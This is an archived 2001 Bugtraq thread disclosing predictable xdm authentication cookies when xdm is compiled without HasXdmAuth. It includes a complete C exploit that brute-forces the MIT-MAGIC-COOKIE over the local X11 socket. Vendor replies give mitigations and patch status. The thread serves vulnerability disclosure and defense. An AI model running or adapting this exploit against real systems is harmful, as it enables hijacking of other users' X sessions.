6706963 2001-07-04 07:52 +0100 /278 rader/ Cyril Diakhate <diakhate@easynet.fr>
Sänt av: joel@lysator.liu.se
Importerad: 2001-07-04 22:09 av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <17785>
Ärende: xdm cookies fast brute force
------------------------------------------------------------
From: "Cyril Diakhate" <diakhate@easynet.fr>
To: <bugtraq@securityfocus.com>
Message-ID: <001301c10455$f3480840$0501a8c0@cd.fr>
##
## advisory for xdm cookies fast brute force
##
Current versions of xdm are sensitive to trivial brute force attack if
it is compiled with bad options, mainly HasXdmXauth.
Without this option, cookie is generated from gettimeofday(2). If you
know starting time of xdm login session, computation of the coookie
just takes a few seconds.
Necessary conditions for the bug to be exploited :
- have access to X11 socket (TCP or UNIX) ;
- know starting date of xdm login session;
- no need for big computation power (pentium 200MHz should be enough).
Drawbacks due to exploitation of the bug :
- victim's X server consumes much system resource ;
- many X server configurations let it generate many logs entries.
Solutions :
- use good compilation options ;
- limit access to X11 sockets (start X server with "-nolisten tcp"...)
[Frome release notes] Since xdm is dynamically linked, there's no
issue on export restriction out- side US for this binary distribution
of xdm: it does not contain the DES encryption code. So it's now
included in the bin package.
However the file xc/lib/Xdmcp/WrapHelp.c is not included in the
XFree86-3.3 source, so support for XDM-AUTHORIZATION-1 is not
included here. You'll have to get WrapHelp.c and rebuild xdm after
having set HasXdmAuth in xf86site.def.
The file is available within the US; for details see
ftp.x.org:/pub/R6/xdm- auth/README. [.]
X11 code:
---8<---
void
GenerateAuthData (char *auth, int len)
{
long ldata[2];
#ifdef ITIMER_REAL
{
struct timeval now;
X_GETTIMEOFDAY (&now);
ldata[0] = now.tv_usec;
ldata[1] = now.tv_sec;
}
#else
{
#ifndef __EMX__
long time ();
#endif
ldata[0] = time ((long *) 0);
ldata[1] = getpid ();
}
#endif
#ifdef HASXDMAUTH
{
int bit;
int i;
auth_wrapper_schedule schedule;
unsigned char data[8];
static int xdmcpAuthInited;
longtochars (ldata[0], data+0);
longtochars (ldata[1], data+4);
if (!xdmcpAuthInited)
{
InitXdmcpWrapper ();
xdmcpAuthInited = 1;
}
_XdmcpAuthSetup (key, schedule);
for (i = 0; i < len; i++) {
auth[i] = 0;
for (bit = 1; bit < 256; bit <<= 1) {
_XdmcpAuthDoIt (data, data, schedule, 1);
if ((data[0] + data[1]) & 0x4)
auth[i] |= bit;
}
}
}
#else
{
int seed;
int value;
int i;
seed = (ldata[0]) + (ldata[1] << 16);
xdm_srand (seed);
for (i = 0; i < len; i++)
{
value = xdm_rand ();
auth[i] = (value & 0xff00) >> 8;
}
value = len;
if (value > sizeof (key))
value = sizeof (key);
memmove( (char *) key, auth, value);
}
#endif
}
---8<---
proof of the concept (to be adapted depending on your version)
---8<---
/*
** xdm-cookie-exploit.c
**
** Made by (ntf & sky)
** Login <ntf@epita.fr>, <sky@epita.fr>
**
** Last update Sun Jun 24 21:38:48 2001 root
*/
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/socket.h>
#include <sys/un.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <time.h>
#include <X11/Xmd.h>
#include <X11/X.h>
#include <signal.h>
void doit(struct timeval t);
void die(char *perror_msg); /* TODO: terminal function */
#define COOKIE_SZ 16
#define TRUE 42
struct s_x11_hdr
{
char endian;
char pad1;
CARD16 protocol_major_version;
CARD16 protocol_minor_version;
CARD16 authorization_protocol_name_length;
CARD16 authorization_protocol_data_length;
CARD16 pad2;
char authorization_protocol_name[20];
char authorization_protocol_data[16];
};
static unsigned long int next = 1;
static unsigned int total = 0;
void on_sigint(int sig)
{
printf("total: %d\n", total);
}
int main(ac,av)
int ac;
char *av[];
{
struct timeval t;
if (ac < 3)
{
fprintf (stderr, "%s: usage time_insec time_inusec\n", av[0]);
exit (4);
}
t.tv_sec = atoi(av[1]);
t.tv_usec = atoi(av[2]);
printf("sec == %lu\nusec == %lu\n", t.tv_sec, t.tv_usec);
doit(t);
return (0);
}
static int inline xdm_rand(void)
{
next = next * 1103515245 + 12345;
return (unsigned int)(next / 65536) % 32768;
}
void print_cookie(unsigned char cookie[COOKIE_SZ])
{
int i;
printf("cookie=");
for (i = 0; i < COOKIE_SZ; i++)
printf("%02x", cookie[i]);
printf("\n");
}
void doit(t)
struct timeval t;
{
unsigned char cookie[COOKIE_SZ];
long ldata[2];
struct sockaddr_un addr;
char buffer[1024];
struct s_x11_hdr x11hdr;
ldata[0] = t.tv_usec;
ldata[1] = t.tv_sec;
total = 0;
x11hdr.endian = 'l';
x11hdr.protocol_major_version = X_PROTOCOL;
x11hdr.protocol_minor_version = X_PROTOCOL_REVISION;
x11hdr.authorization_protocol_name_length = 18;
x11hdr.authorization_protocol_data_length = 16;
bcopy("MIT-MAGIC-COOKIE-1", x11hdr.authorization_protocol_name, 18);
for (total = 0; TRUE; total++)
{
int fd;
int i;
if (!ldata[0])
ldata[1]--;
ldata[0]--;
if ((fd = socket(PF_LOCAL, SOCK_STREAM, 0)) == -1)
die("socket");
memset(&addr, 0, sizeof(addr));
addr.sun_family = AF_LOCAL;
strcpy(addr.sun_path, "/tmp/.X11-unix/X0");
if ((connect(fd, (struct sockaddr*)&addr, sizeof(addr))) == -1)
die("connect");
next = (ldata[0]) + (ldata[1] << 16);
for (i = 0; i < 16; i++)
cookie[i] = (xdm_rand() & 0xff00) >> 8;
bcopy(cookie, x11hdr.authorization_protocol_data, 16);
if (write(fd, &x11hdr, sizeof(x11hdr)) == -1)
die("write");
if (read(fd, buffer, sizeof(buffer)) == -1)
die("read");
if (buffer[0])
{
printf("SUCCESS: ");
print_cookie(cookie);
exit(0);
}
if (!(total % 1000))
{
printf(".");
fflush(stdout);
}
close(fd);
}
exit(42);
}
void die(str)
char *str;
{
perror(str);
exit(4);
}
---8<---
--
NtF - ntf@epita.fr
Sky - sky@epita.fr
(6706963) /Cyril Diakhate <diakhate@easynet.fr>/(Ombruten)
Kommentar i text 6710434 av Roman Drahtmueller <draht@suse.de>
Kommentar i text 6710474 av Andrew van der Stock <ajv@e-secure.com.au>
6710434 2001-07-05 17:12 +0200 /65 rader/ Roman Drahtmueller <draht@suse.de>
Sänt av: joel@lysator.liu.se
Importerad: 2001-07-05 19:21 av Brevbäraren
Extern mottagare: Cyril Diakhate <diakhate@easynet.fr>
Extern mottagare: bugtraq@securityfocus.com
Extern kopiemottagare: security@suse.de
Mottagare: Bugtraq (import) <17794>
Kommentar till text 6706963 av Cyril Diakhate <diakhate@easynet.fr>
Ärende: Re: xdm cookies fast brute force
------------------------------------------------------------
From: Roman Drahtmueller <draht@suse.de>
To: Cyril Diakhate <diakhate@easynet.fr>, <bugtraq@securityfocus.com>
Cc: <security@suse.de>
Message-ID: <Pine.LNX.4.33.0107051651460.21680-100000@dent.suse.de>
>
> Current versions of xdm are sensitive to trivial brute force attack if
> it is compiled with bad options, mainly HasXdmXauth.
>
> Without this option, cookie is generated from gettimeofday(2). If you
> know starting time of xdm login session, computation of the coookie
> just takes a few seconds.
>
> Necessary conditions for the bug to be exploited :
> - have access to X11 socket (TCP or UNIX) ;
> - know starting date of xdm login session;
> - no need for big computation power (pentium 200MHz should be enough).
>
> Drawbacks due to exploitation of the bug :
> - victim's X server consumes much system resource ;
> - many X server configurations let it generate many logs entries.
>
> Solutions :
> - use good compilation options ;
> - limit access to X11 sockets (start X server with "-nolisten tcp"...)
The supported SuSE Linux distributions (6.3 and later) for the i386,
ia64, ppc, s390 and sparc distributions do have the Wraphelp.c code
as well as the HasXdmAuth option defined and are therefore not
vulnerable to the attack.
The AXP Alpha distributions however do _not_ contain the enhanced
authentication scheme. Please see the upcoming SuSE Security
announcements for more information.
As a temporary workaround for the AXP installation in the wild, run the
X-server on your AXP machine with the
"-nolisten tcp" option. By consequence, the X-server will only be
reachable through the socket in the /tmp/.X11-unix/ directory, connections
from remote clients to the X-server will fail. If you use X11-forwarding
as provided by the ssh (secure shell) or openssh package, you will still
be able to use clients from a remote machine. For this, change the line in
/usr/X11R6/lib/X11/xdm/Xservers to read
:0 local /usr/X11R6/bin/X :0 vt07 -nolisten tcp
, then restart xdm (rcxdm restart). Caution: This will log you out!
Alternatively, you could as well filter the port 6000 (for DISPLAY :0)
on the machine running the X-server using the command
ipchains -I input -d 0/0 6000 -p tcp -j DENY -l
Be aware that adding the "-nolisten tcp" option to the X-server
commandline or the above firewall rule does not keep a local shell
user on your system from attacking your X-server. In fact, a local
attacker will find it easier to determine the exact time when the
session started.
Thanks,
Roman Drahtmüller,
SuSE Security.
--
- -
| Roman Drahtmüller <draht@suse.de> // "Caution: Cape does |
SuSE GmbH - Security Phone: // not enable user to fly."
| Nürnberg, Germany +49-911-740530 // (Batman Costume warning label) |
- -
(6710434) /Roman Drahtmueller <draht@suse.de>/(Ombruten)
6710474 2001-07-06 00:14 +1000 /29 rader/ Andrew van der Stock <ajv@e-secure.com.au>
Sänt av: joel@lysator.liu.se
Importerad: 2001-07-05 19:35 av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <17795>
Kommentar till text 6706963 av Cyril Diakhate <diakhate@easynet.fr>
Ärende: RE: xdm cookies fast brute force
------------------------------------------------------------
From: "Andrew van der Stock" <ajv@e-secure.com.au>
To: <bugtraq@securityfocus.com>
Message-ID: <GLEMLPDJLNNLKLDLMOJEGEGCCAAA.ajv@e-secure.com.au>
This is related to a 1995 CERT advisory:
http://packetstorm.securify.com/advisories/mci/iMCISE:MIIGS:XVUL:1102:95:P1:
R1
It may be a misconfiguration issue, at best. However, since it's been
brought up again, it is worthwhile reexamining the code
concerned. Cruft is bad.
I have forwarded the post to the XFree86 devel group with my two
cents.
Andrew
-----Original Message-----
From: Cyril Diakhate [mailto:diakhate@easynet.fr]
Sent: Wednesday, 4 July 2001 16:52
To: bugtraq@securityfocus.com
Subject: xdm cookies fast brute force
##
## advisory for xdm cookies fast brute force
##
(6710474) /Andrew van der Stock <ajv@e-secure.com.au>/(Ombruten)
6714959 2001-07-06 14:25 +0100 /41 rader/ Cyril Diakhate <diakhate@easynet.fr>
Sänt av: joel@lysator.liu.se
Importerad: 2001-07-06 19:42 av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <17823>
Ärende: multiple vendors XDM mis-compilation [Was: xdm cookies fast brute force]
------------------------------------------------------------
From: "Cyril Diakhate" <diakhate@easynet.fr>
To: <bugtraq@securityfocus.com>
Message-ID: <007701c1061f$42874a40$0501a8c0@cd.fr>
a few explanations about this advisory:
- we haven't contacted x.org or xfree because the XFree folks are
_not_ concerned. The problem comes from the "HasXdmAuth" option, and
it is the responsability of the vendor to compile his X release with
this option activated. The best way to contact all vendors aware
about security without forgetting one is to post in this list.
- nowadays, XFree86 logs this attack by default (which apparently was
not the case in 1995)
- we are not sure that the 1995 CERT advisory
(http://packetstorm.securify.com/advisories/mci/iMCISE:MIIGS:XVUL:1102:95:P1
:R1) is about the same problem. That one was about poor /dev/random
randomness, possible files rigths misconfiguration (authorithy files
readable by anyone) and so on. Our advisory is about cookie computation in a
few seconds, _not_ depending of the /dev/random randomness quality.
- the solution is in the advisory (compile xdm with "HasXdmXauth"
option activated)
- exploitation of this bug needs local access, remote exploitation is
possible but far much difficult and we didn't post the remote version.
- some vendors (NetBSD, SuSE...) already have a solution (NetBSD 1.5,
SuSE 6.3 and + on i386, ia64, ppc, s390 and sparc...)
--
Nicolas MAWART - NtF - ntf@epita.fr
Cyril DIAKHATE - Sky - sky@epita.fr
(6714959) /Cyril Diakhate <diakhate@easynet.fr>/(Ombruten)